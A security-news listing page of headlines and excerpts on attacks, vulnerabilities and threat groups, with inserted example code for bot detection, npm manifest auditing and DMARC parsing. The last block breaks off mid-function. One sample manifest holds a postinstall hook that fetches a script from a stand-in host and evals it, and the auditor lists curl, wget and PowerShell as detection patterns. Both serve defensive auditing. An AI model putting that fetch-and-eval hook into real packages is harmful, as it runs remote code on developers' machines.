A financially motivated threat group is attacking organizations using fully patched, end-of-life SonicWall Secure Mobile Access 100 series appliances, Google Threat Intelligence Group said in a report released Wednesday. The group, which Google identifies as UNC6148, is using previously stolen admin credentials to gain access to SonicWall SMA 100 series appliances, remote access VPN devices…
Category: Research
Cybercrime, Cybersecurity, Global Security News, Government, North America, Research
Former Army soldier pleads guilty to widespread attack spree linked to AT&T, Snowflake and others
A 21-year-old former Army soldier pleaded guilty Tuesday to charges stemming from a series of attacks and extortion attempts last year on telecommunications companies, including AT&T. Cameron John Wagenius, who identified himself as “kiberphant0m” and “cyb3rph4nt0m” on online criminal forums, conducted extensive malicious activity for years, including while he was on active duty, the Justice…
Cybercrime, Cybersecurity, Exploits, Global Security News, Research, Threats
AsyncRAT seeds family of more than 30 remote access trojans
AsyncRAT, the most prevalent remote access trojan observed in the wild, has spawned more than 30 forks and variants that increase the impact of the open-source malware, making it a popular and sometimes disguised tool of choice for cybercriminals, ESET researchers said in a report released Tuesday. The open source remote access tool, which was…
CISA, Cybercrime, Cybersecurity, Exploits, Global Security News, Research, Threats
CitrixBleed 2 beckons sweeping alarm as exploits spread across the globe
Authorities and researchers are intensifying warnings about active exploitation and pervasive scanning of a critical vulnerability affecting multiple versions of Citrix NetScaler products. There is now widespread agreement among security professionals that the critical vulnerability, CVE-2025-5777, which Citrix disclosed June 17, is serious and harkens back to a 2023 defect in the same products: “CitrixBleed,”…
AI, Cybersecurity, Exploits, Global Security News, Research, Technology, Uncategorized
Is XBOW’s success the beginning of the end of human-led bug hunting? Not yet.
When news broke that an AI agent named XBOW was leading the HackerOne bug bounty leaderboards, it quickly raised several concerning questions for the cybersecurity industry. Have large language models evolved enough to partially or fully replace human bug hunting? How precisely does XBOW — built by a startup with the same name — work?…
Cybersecurity, Exploits, Global Security News, Microsoft, Research, Technology, Threats
Microsoft Patch Tuesday addresses 130 vulnerabilities, none actively exploited
Microsoft addressed 130 vulnerabilities across its products and underlying Windows systems, but none have been actively exploited in the wild, the company said in its latest security update Tuesday. A proof-of-concept exploit for a high-severity defect in SQL Server — CVE-2025-49719 — has been shared publicly, researchers said. The information disclosure vulnerability, which has a…
Application Security, Cybersecurity, Exploits, Global Security News, Research, Technology, Threats
Oligo Security strives to fill application-layer gaps in MITRE ATT&CK framework
Applications are a common intrusion point, but the way attackers gain access, maneuver and create mayhem within and across applications doesn’t always neatly fit into MITRE’s ATT&CK framework. The team at Oligo Security is releasing a new framework it calls Application Attack Matrix to complement areas of MITRE’s framework that it describes as too broad,…
Cybercrime, Cybersecurity, Exploits, Geopolitics, Global Security News, Research, Threats
China-linked attacker hit France’s critical infrastructure via trio of Ivanti zero-days last year
Multiple critical infrastructure sectors were hit last year during an attack spree in France via a trio of zero-day vulnerabilities affecting Ivanti Cloud Service Appliance devices, the country’s cybersecurity agency said in a report released Tuesday. Government agencies and organizations in the telecommunications, media, finance and transportation industries were impacted by widespread zero-day exploits of…
Asia Pacific, china, Cybersecurity, Global Security News, Research, Threats
Stealth China-linked ORB network gaining footholds in US, East Asia
A recently discovered operational relay box (ORB) network controlled by a China-linked threat group already exceeds 1,000 devices and is growing across the United States and East Asia, SecurityScorecard said in a threat report released Monday. The ORB network, which SecurityScorecard dubbed “LapDogs,” is primarily composed of routers designed for small or home offices but…
AI, Artificial Intelligence (AI), Cybersecurity, Exploits, Global Security News, Research, software security, Technology, Uncategorized, vibe coding
Vibe coding is here to stay. Can it ever be secure?
Software powers the world, and soon, the bulk of the work making it may be done by machines. As generative AI tools have gotten more proficient at coding, their use in software development has exploded. Proponents say the tools have made it dramatically easier for individual entrepreneurs or companies to create the kind of slick,…
crowdstrike, Cybercrime, Cybersecurity, Global Security News, Google, Mandiant, Microsoft, Palo Alto Networks, Ransomware, Research, Threat group, Threats, Uncategorized, Unit 42
CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution
CrowdStrike and Microsoft announced an agreement Monday to formally connect the different names each company uses for the same threat groups in their attribution analysis. The companies said the effort will clarify inconsistencies across the industry’s naming taxonomies and acknowledge when both companies identify the same threat groups. The alliance between the longstanding competitors doesn’t…
Commentary, CVE, Cybersecurity, Exploits, Global Security News, MITRE, NVD, Research, Technology, Threats, Vulnerability Management
Future-ready cybersecurity: Lessons from the MITRE CVE crisis
The recent funding crisis surrounding MITRE’s Common Vulnerabilities and Exposures (CVE) program was more than just a bureaucratic hiccup — it was a wake-up call for an industry that has relied on CVEs for years to identify, categorize, and prioritize vulnerabilities. Out of the blue, we discovered the foundation was suddenly at risk. Worse still,…
cyberattack, Cybersecurity, Exploits, Global Security News, Hardware, Research, Security Bloggers Network, Threats & Breaches
Hacking the Hardware Brains of Computers is the Ultimate Cyberattack
Compromising the hardware layer, especially the CPU, is the Holy Grail of cyberattacks. Recent work by Christiaan Beek, a leading cybersecurity researcher at Rapid7, into developing a ransomware proof-of-concept that infects at the hardware layer, inside the CPU, is truly scary. The research demonstrates just how real this threat could become. He was able to…
Cybercrime, Cybersecurity, Exploits, Global Security News, Microsoft, Patch Tuesday, Ransomware, Research, Threats, vulnerabilities, zero days
Microsoft’s Patch Tuesday closes 72 vulnerabilities, including 5 zero-days
Microsoft addressed 72 vulnerabilities affecting its core products and underlying systems, including five actively exploited zero-days across various Windows components, the company said in its latest security update Tuesday. “This is now the eighth consecutive Patch Tuesday on which Microsoft has published zero-day vulnerabilities without evaluating any of them as critical severity at time of…
Check Point, CISA, cisco, CVE, Cybercrime, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), exploit, Exploits, firewall, Fortinet, Global Security News, Mandiant, Palo Alto Networks, Rapid7, Research, sonicwall, Technology, Threats, virtual private network (VPN), vulnerabilities
SonicWall customers confront resurgence of actively exploited vulnerabilities
Vulnerabilities are proliferating in SonicWall devices and software this year, putting the vendor’s customers at risk of intrusion via secure access gateways and firewalls. The year started off on a sour note for the California-based company when it released security advisories for nine vulnerabilities on Jan. 7. The total number of vulnerabilities publicly disclosed by…
Amazon, CISA, crowdstrike, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), Global Security News, Google, Government, intelligence sharing, Joint Cyber Defense Collaborative, Joint Cyber Defense Collaborative (JCDC), National Security Agency, Palo Alto Networks, Research, Technology, Threat Intelligence, Threats
Amazon, CrowdStrike, Google and Palo Alto Networks claim no change to threat intel sharing under Trump
SAN FRANCISCO — Threat intelligence sharing is flowing between the private sector and federal government and remains unimpeded thus far by job losses and budget cuts across federal agencies that support the cyber mission, according to executives at major security firms. Top brass at Amazon, CrowdStrike, Google and Palo Alto Networks said there’s been no…
Global Security News, Research, Security Bloggers Network
Vulnerability Management: A Race Against Time & Complexity
The post Vulnerability Management: A Race Against Time & Complexity appeared first on AI Security Automation. The post Vulnerability Management: A Race Against Time & Complexity appeared first on Security Boulevard.
Cybercrime, Cybersecurity, Global Security News, google cloud, Google Threat Intelligence Group, Mandiant, North Korea, North Korean IT workers, Research, Technology, Threats
North Korean operatives have infiltrated hundreds of Fortune 500 companies
SAN FRANCISCO — North Korean nationals have infiltrated the employee ranks at top global companies more so than previously thought, maintaining a pervasive and potentially widening threat against IT infrastructure and sensitive data. “There are hundreds of Fortune 500 organizations that have hired these North Korean IT workers,” Mandiant Consulting CTO Charles Carmakal said Tuesday…
Amazon, crowdstrike, Cybercrime, Cybersecurity, Global Security News, Government, law enforcement, Research, RSAC 2025 Conference, Threat Intelligence, Threats
Amazon, CrowdStrike leaders say private threat intel can quickly bring cybercriminals to justice
SAN FRANCISCO — Threat intelligence flowing from private companies to cybersecurity authorities and law enforcement agencies is critical to the disruption of malicious activities and the arrests of cybercriminals, security leaders at Amazon and CrowdStrike said Monday during the RSAC 2025 Conference. When the private sector and governments interact well, actively participating and sharing resources…
Global Security News, Research, Security Bloggers Network
Fraudulent email domain tracker: April 2025
This is the first release in a new Castle series highlighting email domains associated with fraudulent activity. Our goal is to provide visibility into email infrastructure commonly abused by bots and fraudsters, so that security teams can improve their detection systems. Each month, we’ll publish a ranked list The post Fraudulent email domain tracker: April…
china, critical infrastructure, FireEye, Global Security News, North Korea, North Korean IT workers, Ransomware, Research, Russia, SentinelOne, SolarWinds, telecommunications, Threats, Workforce
Cybersecurity vendors are themselves under attack by hackers, SentinelOne says
Cybersecurity companies don’t just defend their customers against cyberattacks — they also have to defend themselves, and a SentinelOne report published Monday examines some of the biggest threats they’re facing. Those include ransomware, Chinese government-sponsored hackers and North Korean IT workers posing as job applicants, according to the report from SentinelOne’s SentinelLabs. “In recent months,…
CVE, Cybercrime, Cybersecurity, Exploits, Global Security News, Research, SAP, Threats, vulnerabilities, zero days
SAP zero-day vulnerability under widespread active exploitation
Threat hunters and security researchers have observed widespread exploitation of a zero-day vulnerability affecting SAP NetWeaver systems. The unrestricted file upload vulnerability — CVE-2025-31324 — has a base score of 10 on the CVSS scale and allows attackers to upload files directly to the system without authorization. The software defect, which affects the SAP Visual…
CISA, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), Exploits, Global Security News, IBM X-Force, known exploited vulnerabilities (KEV), Mandiant, Research, Verizon Data Breach Investigations Report, Verizon DBIR, VulnCheck, vulnerabilities
VulnCheck spotted 159 actively exploited vulnerabilities in first few months of 2025
Attackers exploited nearly a third of vulnerabilities within a day of CVE disclosure in the first quarter of 2025, VulnCheck said in a report released Thursday. The company, which focuses on vulnerability threat intelligence, identified 159 actively exploited vulnerabilities from 50 sources during the quarter. The time from CVE disclosure to evidence of exploitation in…
Cybercrime, Cybersecurity, exploit, Exploits, firewall, Fortinet, Global Security News, Google Threat Intelligence Group, ivanti, Mandiant, Palo Alto Networks, Ransomware, Research, routers, Threats, virtual private network (VPN), vulnerabilities
Attackers hit security device defects hard in 2024
Attackers are having a field day with software defects in security devices, according to a new report released Wednesday by Mandiant. Exploits were the most common initial infection vector, representing 1 of every 3 attacks in 2024, and the four most frequently exploited vulnerabilities were all contained in edge devices, such as VPNs, firewalls and…
Cybercrime, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), Data Breaches, Exploitation, Exploits, Global Security News, Ransomware, ransomware payments, Research, Threats, Verizon Data Breach Investigations Report, Verizon DBIR, zero days
Verizon discovers spike in ransomware and exploited vulnerabilities
Cybercriminals and state-sponsored threat groups exploited vulnerabilities and initiated ransomware attacks with vigor last year, escalating the scope of their impact by hitting more victims and outmaneuvering defenses with speed. The rate of ransomware detected in data breaches jumped 37%, occurring in 44% of the 12,195 data breaches reviewed in Verizon’s 2025 Data Breach Investigations…
Cybercrime, Cybersecurity, exploit, Exploits, Global Security News, IBM, IBM X-Force, Research, stolen credentials, Threats, vulnerabilities
Attackers stick with effective intrusion points, valid credentials and exploits
IBM X-Force observed an identical breakdown of the top methods cybercriminals used to intrude networks for two years running, the company said in its annual Threat Intelligence Index. The top initial access vectors, valid account credentials and exploitation of public-facing applications, each accounted for 30% of IBM X-Force incident response cases last year. By focusing…
AI, Global IT News, Global Security News, Government & Policy, Research
An AI doctoral candidate in California says they had their student visa revoked
An AI doctoral student in California had their SEVIS record — the digital proof of their valid student visa — terminated, putting their immigration status at risk. Speaking to TechCrunch, the student, who requested anonymity for fear of reprisal, said they were notified via their college’s international student center that they’d been identified in a criminal records…
Blog, Global Security News, Research, Security Bloggers Network
Trump vs. Biden Cyber Strategy — According to AI
We asked an AI agent to analyze the latest shift in U.S. cybersecurity policy, comparing past strategies under Biden to the new 2025 Trump Executive Order. The result? A surprisingly structured analysis that maps out the core philosophical and operational differences, from federal-led resilience to localized risk ownership. But this raises a more provocative question:…
china, CISA, cisco, citrix, CVE, Cybercrime, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), espionage, exploit, Exploits, firewall, firewalls, Fortinet, Gartner, Global Security News, Google Threat Intelligence Group, ivanti, known exploited vulnerabilities (KEV), Mandiant, National Vulnerability Database, NIST, Palo Alto Networks, Rapid7, Research, routers, Technology, Threats, virtual private network (VPN), VulnCheck, vulnerabilities, vulnerability disclosure, zero days
Is Ivanti the problem or a symptom of a systemic issue with network devices?
Network edge devices — hardware that powers firewalls, VPNs and network routers — have quickly moved up the list of attackers’ preferred intrusion points into enterprise networks. While dozens of companies make and sell these devices, customers of one company in particular — Ivanti — have confronted exploited vulnerabilities in their products more than any…
AI, Artificial Intelligence, Global Security News, Microsoft, Research
AI models still struggle to debug software, Microsoft study shows
AI models from OpenAI, Anthropic, and other top AI labs are increasingly being used to assist with programming tasks. Google CEO Sundar Pichai said in October that 25% of new code at the company is generated by AI, and Meta CEO Mark Zuckerberg has expressed ambitions to widely deploy AI coding models within the social…
Cybercrime, Cybersecurity, Exploits, Global Security News, Microsoft, Patch Tuesday, Ransomware, Research, Threats, vulnerabilities, zero days
Microsoft patches zero-day actively exploited in string of ransomware attacks
Microsoft addressed 126 vulnerabilities affecting its systems and core products, including a zero-day in the Windows Common Log File System (CLFS) that’s been actively exploited in a series of ransomware attacks, the company said in its latest security update Tuesday. A group Microsoft tracks as Storm-2460 has exploited CVE-2025-29824 to initiate ransomware attacks “against a…
Exploits, Global Security News, ntlm relay, Red Team, Research, Security Bloggers Network, Social Engineering
The Renaissance of NTLM Relay Attacks: Everything You Need to Know
NTLM relay attacks have been around for a long time. While many security practitioners think NTLM relay is a solved problem, or at least a not-so-severe one, it is, in fact, alive and kicking and arguably worse than ever before. Relay attacks are the easiest way to compromise domain-joined hosts nowadays, paving a path for…
Email Security Insights, Global Security News, North America, Research, Security Bloggers Network
DMARC Adoption in U.S. and Canada Higher Education Sector
We’re looking at how DMARC adoption is shaping the email security landscape of colleges and universities in North America. The post DMARC Adoption in U.S. and Canada Higher Education Sector appeared first on Security Boulevard.
china, CISA, Cybersecurity, Cybersecurity and Infrastructure Security Agency, espionage, exploit, Exploits, Global Security News, Google Threat Intelligence Group, ivanti, known exploited vulnerabilities (KEV), Mandiant, Research, Threats, vulnerability
China-backed espionage group hits Ivanti customers again
Ivanti customers are confronting another string of attacks linked to an actively exploited vulnerability in the company’s VPN products. Mandiant said a nation-state backed espionage group linked to China has been exploiting the critical vulnerability, CVE-2025-22457, since mid-March. The threat group, which Google Threat Intelligence Group tracks as UNC5221, has a knack for exploiting Ivanti…
Asia Pacific, Email Security Insights, Global Security News, Research, Security Bloggers Network
DMARC Adoption among APAC’s Higher Education Sector
On the heels of our DMARC adoption research in Europe’s higher education sector, we’re taking a look to see how schools in the Asia Pacific region are faring with their email security. The post DMARC Adoption among APAC’s Higher Education Sector appeared first on Security Boulevard.
Check Point, cisco, Cybersecurity, Exploits, firewall, Forcepoint, Fortinet, Global Security News, google cloud, Juniper Networks, Microsoft Azure, Palo Alto Networks, Research, Technology, Versa Networks
Independent tests show why orgs should use third-party cloud security services
Businesses don’t always get what they pay for in cybersecurity. Some of the most expensive cloud network firewall vendors are among the worst performers against exploits and evasions, according to the most comprehensive, independent testing CyberRatings.org has conducted to date. Cisco, by far the most expensive cloud network firewall offering across the top 10 vendors…
cisco, Cisco Talos, Cybercrime, Cybersecurity, Global Security News, identity, identity authentication, Ransomware, Research, Threats
Identity lapses ensnared organizations at scale in 2024
Cybercriminals predominantly relied on weaknesses in identity controls to afflict organizations in 2024, with valid accounts being the main way they gained access for the second year in a row, Cisco Talos said in an annual report released Monday. Across the incident response cases Cisco Talos responded to last year, 60% involved an identity attack…
Blog, Global Security News, Research, Security Bloggers Network
Tax Season Threat Surge
Veriti Research has identified a significant rise in tax-related malware samples across multiple platforms. The research team discovered malware samples targeting Android, Linux, and Windows, all connected to the same adversary operating from a single IP address. We believe the attacker is running multiple parallel campaigns and using “Malware-as-a-Service” tools to target various platforms simultaneously,…
crowdstrike, Cybercrime, Cybersecurity, Global Security News, North Korea, North Korean IT workers, Palo Alto Networks, Research, Threats, Unit 42
The North Korea worker problem is bigger than you think
North Korean nationals have infiltrated businesses across the globe with a more expansive level of organization and deep-rooted access than previously thought, insider risk management firm DTEX told CyberScoop. This swarm of technical North Korean experts isn’t just intruding into businesses as ad hoc freelance IT workers; they’ve gained full-time employment as engineers and specialists of…
Blog, Global Security News, Research, Security Bloggers Network
Inside Daisy Cloud: 30K Stolen Credentials Exposed
Veriti research recently analyzed stolen data that was published in a Telegram group named “Daisy Cloud” (potentially associated with the RedLine Stealer), exposing the inner workings of a cybercrime marketplace. This group offers thousands of stolen credentials on an ongoing basis across a wide range of services, from crypto exchanges to government portals, at disturbingly…
Blog, Global Security News, Research, Security Bloggers Network
Genetic Breach Fallout: 23andMe’s Collapse Raises Security Alarms
In 2023, a massive data breach at 23andMe shook the foundation of the consumer genomics industry. Fast forward to today, the company has filed for bankruptcy. From Veriti’s perspective, this incident highlights the devastating consequences of failing to secure deeply sensitive personal data, especially when that data reaches beyond individuals and into family legacies. Veriti…
Cybersecurity, extensions, Global Security News, Research, threat, Threats, Web Browsers
Browser extension sales, updates pose hidden threat to enterprises
Sometimes the simplest pieces of software can cause the most complex security headaches for organizations. Browser extensions, which can be bought, sold and repurposed without warning, are a blind spot for organizations — ignored and often left unrecognized as a hidden threat. John Tuckner, founder of the browser extension security company Secure Annex, recently demonstrated…
Cloud Security, Cybersecurity, Exploits, Global Security News, Kubernetes, Nginx, open source, open source software, Research, Threats
String of defects in popular Kubernetes component puts 40% of cloud environments at risk
More than 40% of cloud environments are at risk of an account takeover due to a series of five recently discovered vulnerabilities — one regarded as critical — in the Ingress Nginx Controller for Kubernetes, according to security research published this week. Upon discovering the string of vulnerabilities in one of the most widely used ingress controllers…
CVE, Cybersecurity, Exploits, Global Security News, Next.js, open source, open source software, Research, vulnerability, vulnerability disclosure
Researchers raise alarm about critical Next.js vulnerability
Researchers warn that attackers could exploit a recently discovered critical vulnerability in the open-source JavaScript framework Next.js to bypass authorization in middleware and gain access to targeted systems. Vercel, the San Francisco-based company that created and maintains Next.js, released a patch for CVE-2025-29927 in Next.js 15.2.3 on March 18 and published a security advisory on…
china, Cybercrime, Cybersecurity, Evil Corp, Exploits, Global Security News, Government, India, Microsoft, nation state threats, nation-state hackers, North Korea, pakistan, Ransomware, Research, Russia, Stanford University, Threats, trend micro, vulnerability, Windows, Zero Day Initiative, zero days
Nation-state groups hit hundreds of organizations with Microsoft Windows zero-day
Cybercriminals working on behalf of at least six nation-states are actively exploiting a zero-day vulnerability in Microsoft Windows to commit espionage, steal data and cryptocurrency, according to Trend Micro researchers. The vulnerability, which Trend Micro tracks as ZDI-CAN-25373, allows attackers to execute hidden malicious commands due to the way Windows displays the contents of shortcut…
AI, Global IT News, Global Security News, Research, scaling
Researchers say they’ve discovered a new method of ‘scaling up’ AI, but there’s reason to be skeptical
Have researchers discovered a new AI “scaling law”? That’s what some buzz on social media suggests — but experts are skeptical. AI scaling laws, a bit of an informal concept, describe how the performance of AI models improves as the size of the datasets and computing resources used to train them increases. Until roughly a…
AI, Global IT News, Global Security News, iclr, Research
Academics accuse AI startups of co-opting peer review for publicity
There’s a controversy brewing over “AI-generated” studies submitted to this year’s ICLR, a long-running academic conference focused on AI. At least three AI labs — Sakana, Intology, and Autoscience — claim to have used AI to generate studies that were accepted to ICLR workshops. At conferences like ICLR, workshop organizers typically review studies for publication…
Cybercrime, Cybersecurity, Data Breaches, Flashpoint, Global Security News, identity, identity theft, Information stealing malware, infostealers, malware, Ransomware, Research, stolen credentials
Infostealers fueled cyberattacks and snagged 2.1B credentials last year
Cybercriminals used information-stealing malware to devastating effect last year, capturing sensitive data that fueled ransomware, breaches and attacks targeting supply chains and critical infrastructure, according to a new report. Infostealers were used to steal 2.1 billion credentials last year, accounting for nearly two-thirds of the 3.2 billion credentials stolen from all organizations, Flashpoint said in a…
Global Security News, Research, Security Bloggers Network
How to detect Headless Chrome bots instrumented with Puppeteer?
Headless Chrome bots powered by Puppeteer are a popular choice among bot developers. The Puppeteer API’s ease of use, combined with the lightweight nature of Headless Chrome, makes it a preferred tool over its full-browser counterpart. It is commonly used for web scraping, credential stuffing attacks, and the…
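As an added illustration of the detection problem the post raises (this is example code, not the post's own method): an unmodified Puppeteer-driven Headless Chrome leaks several well-known client-side tells, and a page can score them before deciding whether a visitor is a bot. The signal list, weights and threshold below are this example's assumptions, and the three navigator/window samples are constructed, not captured sessions. The code runs under Node on plain objects; in a browser you would pass the real `navigator` and `window`.

```javascript
// Added example: score widely cited client-side signals that separate an
// unmodified Puppeteer-driven Headless Chrome from an interactive Chrome.
// Signals, weights and threshold are assumptions chosen for illustration.

const HEADLESS_SIGNALS = [
  // Puppeteer launches Chrome with automation enabled, which sets
  // navigator.webdriver to true unless the bot author actively hides it.
  { name: "navigator.webdriver is true", weight: 5,
    test: (nav) => nav.webdriver === true },
  // Headless Chrome names itself in the user agent unless overridden.
  { name: "HeadlessChrome in userAgent", weight: 5,
    test: (nav) => /HeadlessChrome/.test(nav.userAgent || "") },
  // Interactive Chrome ships built-in plugins (PDF viewer); headless has none.
  { name: "empty navigator.plugins", weight: 2,
    test: (nav) => !nav.plugins || nav.plugins.length === 0 },
  // A real profile reports at least one accepted language.
  { name: "empty navigator.languages", weight: 2,
    test: (nav) => !nav.languages || nav.languages.length === 0 },
  // Interactive Chrome exposes window.chrome; headless builds typically do not.
  { name: "missing window.chrome", weight: 2,
    test: (_nav, win) => win.chrome === undefined },
  // Headless windows report zero outer dimensions.
  { name: "zero outerWidth/outerHeight", weight: 2,
    test: (_nav, win) => win.outerWidth === 0 || win.outerHeight === 0 },
];

// Returns the summed weight of triggered signals, their names, and a verdict
// against `threshold`. Weights are set so either strong signal alone is enough
// while the weak ones must accumulate, which also catches a bot that spoofed
// only the obvious fields.
function scoreHeadlessSignals(nav, win, threshold = 5) {
  const fired = HEADLESS_SIGNALS.filter((s) => s.test(nav, win));
  const score = fired.reduce((sum, s) => sum + s.weight, 0);
  return {
    score,
    triggered: fired.map((s) => s.name),
    isLikelyHeadless: score >= threshold,
  };
}

// Constructed samples, not captured traffic.
const puppeteerDefault = {
  nav: {
    webdriver: true,
    userAgent: "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/124.0.0.0 Safari/537.36",
    plugins: [],
    languages: [],
  },
  win: { outerWidth: 0, outerHeight: 0 },
};

const interactiveChrome = {
  nav: {
    webdriver: false,
    userAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
    plugins: [{ name: "PDF Viewer" }],
    languages: ["en-US", "en"],
  },
  win: { chrome: {}, outerWidth: 1440, outerHeight: 900 },
};

// A partly hardened bot: webdriver and user agent spoofed, the rest forgotten.
const partiallySpoofed = {
  nav: { webdriver: false, userAgent: interactiveChrome.nav.userAgent, plugins: [], languages: [] },
  win: { chrome: {}, outerWidth: 0, outerHeight: 0 },
};

for (const [label, sample] of Object.entries({ puppeteerDefault, interactiveChrome, partiallySpoofed })) {
  console.log(label, scoreHeadlessSignals(sample.nav, sample.win));
}
```

Every one of these fields can be overridden from Puppeteer (stealth plugins do exactly that), so treat the score as one input to a risk decision alongside server-side behavioural signals such as request timing and navigation patterns, not as a verdict on its own.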
CryptoCurrency, Cybercrime, Cybersecurity, GitHub, Global Security News, malware, North Korea, npm, Research, Socket, software security, Threats
Lazarus Group deceives developers with 6 new malicious npm packages
Lazarus Group has burrowed deeper into the npm registry and planted six new malicious packages designed to deceive software developers and disrupt their workflows, researchers at cybersecurity firm Socket said in a Monday blog post. The North Korea-linked threat group embedded BeaverTail malware into the npm packages to install backdoors and steal credentials and data…
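As an added, generic check that is not taken from Socket's report and does not describe the six packages it identified: malicious npm packages most often run their payload from an install-time lifecycle hook, so auditing a package's `package.json` for those hooks and for the commands they run is a cheap first pass before a package reaches a developer workstation. The hook list, the patterns and the three sample manifests below are this example's own constructions.

```javascript
// Added example: flag npm lifecycle hooks and suspicious install-time commands
// in a package manifest. Hooks, patterns and samples are illustrative
// assumptions, not findings from the Socket report.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

const SUSPICIOUS_PATTERNS = [
  { name: "inline node eval", re: /\bnode\s+-e\b|\beval\(/ },
  { name: "remote fetch", re: /\b(curl|wget|Invoke-WebRequest|iwr)\b|https?:\/\//i },
  { name: "base64 payload", re: /\bbase64\b|\batob\(/i },
  { name: "child process", re: /child_process|\bpowershell\b|\bsh\s+-c\b/i },
];

// Returns a risk level plus one finding per lifecycle hook present.
// "medium" means a hook exists (legitimate for native modules) and deserves a
// look; "high" means the hook's command matched a suspicious pattern.
function auditPackageManifest(manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!Object.prototype.hasOwnProperty.call(scripts, hook)) continue;
    const command = String(scripts[hook]);
    const suspicious = SUSPICIOUS_PATTERNS
      .filter((p) => p.re.test(command))
      .map((p) => p.name);
    findings.push({ hook, command, suspicious });
  }
  let risk = "low";
  if (findings.some((f) => f.suspicious.length > 0)) risk = "high";
  else if (findings.length > 0) risk = "medium";
  return { name: manifest.name, risk, findings };
}

// Constructed sample manifests (invented names, not real packages).
const sampleManifests = [
  { name: "tidy-strings", version: "1.0.0", scripts: { test: "node test.js" } },
  { name: "native-hash", version: "2.1.0", scripts: { install: "node-gyp rebuild" } },
  {
    name: "buffer-utilz",
    version: "0.0.3",
    scripts: {
      postinstall:
        "node -e \"require('https').get('https://example.invalid/s',r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\"",
    },
  },
];

function auditAll(manifests) {
  return manifests.map(auditPackageManifest);
}

for (const result of auditAll(sampleManifests)) {
  console.log(JSON.stringify(result));
}
```

In a CI pipeline the same function can run over `node_modules/*/package.json` after a dry-run install; pair it with `npm install --ignore-scripts` for untrusted registries so that a flagged hook never executes before a human has looked at it.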
AI, Global IT News, Global Security News, Research, sakana
Sakana claims its AI-generated paper passed peer review — but it’s a bit more nuanced than that
Japanese startup Sakana said that its AI generated the first peer-reviewed scientific publication. But while the claim isn’t untrue, there are significant caveats to note. The debate swirling around AI and its role in the scientific process grows fiercer by the day. Many researchers don’t think AI is quite ready to serve as a “co-scientist,”…
cyber security, esp32, Exploits, Global Security News, Hardware, internet of things, IoT Security, microcontroller, Mobile Security, Mobility, Research, Security, supply chain, tarlogic, vulnerability, wifi
Billions of Devices at Risk of Hacking & Impersonation Due to Hidden Commands
Researchers warn these commands could be exploited to manipulate memory, impersonate devices, and bypass security controls.
Blog, Global Security News, Research, Security Bloggers Network
Inside Black Basta Ransomware Group’s Chat Leak
Internal conflicts within the notorious Black Basta ransomware group have led to a massive leak of the group’s internal chat messages. While the messages are disorganized and full of internal jargon, they contain a wealth of insight into the group’s operations and techniques. This type of disclosure can be a goldmine for security professionals because…
china, Cybercrime, Cybersecurity, Exploits, Global Security News, hacking, ivanti, Microsoft Threat Intelligence Center, Research, silk typhoon, Threats
Silk Typhoon shifted to specifically targeting IT management companies
The Chinese state-backed threat group Silk Typhoon shifted tactics in late 2024 to broaden access and enable follow-on attacks against downstream customers of its initial targets, Microsoft Threat Intelligence said in a blog released Wednesday. The Chinese espionage group, which is also known as APT27, has abused stolen API keys and credentials for privileged access…
crowdstrike, Cybercrime, Cybersecurity, Global Security News, hacking, Palo Alto Networks, Ransomware, ReliaQuest, Research, Threat Intelligence, Threats, Unit 42
Cybercriminals picked up the pace on attacks last year
Threat actors became increasingly efficient last year, rapidly achieving lateral movement and swiftly stealing data at a faster clip than ever before, according to multiple threat intelligence firms. The reduced time frame is a clear indicator that cybercriminals are constantly improving their ability to be successful. With the abuse of legitimate system tools to help…
AI, Global IT News, Global Security News, Research, science
Experts don’t think AI is ready to be a ‘co-scientist’
Last month, Google announced the “AI co-scientist,” an AI the company said was designed to aid scientists in creating hypotheses and research plans. Google pitched it as a way to uncover new knowledge, but experts think it — and tools like it — fall well short of PR promises. “This preliminary tool, while interesting, doesn’t…
Blog, Exploits, Global Security News, Research, Security Bloggers Network
Veriti Research Uncovers Malware Exploiting Cloud Services
Veriti Research has identified a growing trend – attackers leveraging cloud infrastructure to facilitate malware distribution and command-and-control (C2) operations. This evolving tactic not only makes detection more challenging but also exposes organizations to significant security risks. Malware Hosted on Cloud Services One of the most alarming findings from our research is that over 40%…
Blog, Global Security News, Research, Security Bloggers Network
DPRK IT Fraud Network Uses GitHub to Target Global Companies
Nisos is tracking a network of likely North Korean (DPRK)-affiliated IT workers posing as Vietnamese, Japanese, and Singaporean nationals with the goal of obtaining employment in remote engineering…
Email Security Insights, Europe, Global Security News, Research, Security Bloggers Network
DMARC Adoption among Europe’s Higher Education Sector
This installment initiates a series on DMARC adoption, focusing on policy levels and best practices, in the higher education sector. We’ll begin with Europe.
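To make the "policy levels" the series measures concrete, here is an added example (not code from the post) that parses a DMARC TXT record and ranks its policy as none, quarantine or reject, with the usual best-practice warnings: a monitoring-only `p=none`, a partial `pct`, a subdomain policy weaker than the organisational one, and a record with no aggregate-report address. The domains and mailboxes in the samples are invented.

```javascript
// Added example: parse a DMARC record and classify its policy level.
// Sample records use invented domains and addresses.

const POLICY_RANK = { none: 0, quarantine: 1, reject: 2 };
const hasPolicy = (v) => Object.prototype.hasOwnProperty.call(POLICY_RANK, v);

// Returns null unless the text is a DMARC record: v=DMARC1 must be the first
// tag and p= is mandatory. Other tags fall back to their RFC 7489 defaults.
function parseDmarcRecord(txt) {
  const parts = txt.split(";");
  if (!/^v\s*=\s*DMARC1$/i.test(parts[0].trim())) return null;
  const tags = {};
  for (const part of parts) {
    const [k, ...rest] = part.split("=");
    const key = k.trim().toLowerCase();
    if (key) tags[key] = rest.join("=").trim();
  }
  const p = (tags.p || "").toLowerCase();
  if (!hasPolicy(p)) return null;
  const sp = (tags.sp || "").toLowerCase();
  const pct = tags.pct === undefined ? 100 : Number(tags.pct);
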